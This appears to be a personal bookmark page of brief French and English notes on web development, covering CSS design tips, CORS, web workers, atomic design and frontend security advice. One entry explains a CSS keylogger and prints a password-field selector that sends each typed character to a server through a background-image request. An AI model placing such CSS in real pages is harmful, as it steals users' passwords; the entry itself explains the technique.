290 private links
Mhmhmhmh 🤔
Rails + PostgreSQL + Plain CSS + Heroku is the best for him after this experience.
Sort the components into :
- Atoms
- Molecules
- Organisms
- Templates
- Pages
Malin ! Un keylogger en CSS !
En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.
(via https://links.hoa.ro/shaare/689gzA, via https://bookmarks.ecyseo.net/?cymp8g)
OMG ! 😍
It looks legit to me. I have to give it a try.
CORS est devenu incontournable pour le développement web (front et back) ! Cette documentation explique sont fonctionnement.
Comme d'habitude, la documentation de MDN est de qualité.
- Use color and weight to create hierarchy instead of size
- Don’t use grey text on colored backgrounds
- Reduce the opacity of white text
- Hand-pick a color that’s based on the background color
- Offset your shadows
- Use fewer borders
- Use a box shadow
- Use two different background colors
- Add extra spacing
- Don’t blow up icons that are meant to be small
- Use accent borders to add color to a bland design
- Not every button needs a background color
Using the web workers for long calculation et preserve the main thread for the display, to keep a reactive user interface (such as classical UI actually)
- Ne jamais faire confiance aux applications frontend
- N'utilisez pas votre propre cryptographie
- N'utilisez pas de clé de chiffrement prédictibles
- Ne réutilisez pas une clé de chiffrement
- Obfusquer n'est pas sécuriser
- Sécurisez plutôt votre backend
Et de bon conseils pratiques comme éviter d'utiliser des promesses pour traiter les requêtes du client, mais plutôt des callbacks
(via Riduidel)
Ce format est magnifique !
Avec le projet qui va bien pour convertir aisément les images en webp
(via le courrier du hacker)
Une excellente liste à garder sous le coude
A progress bar :)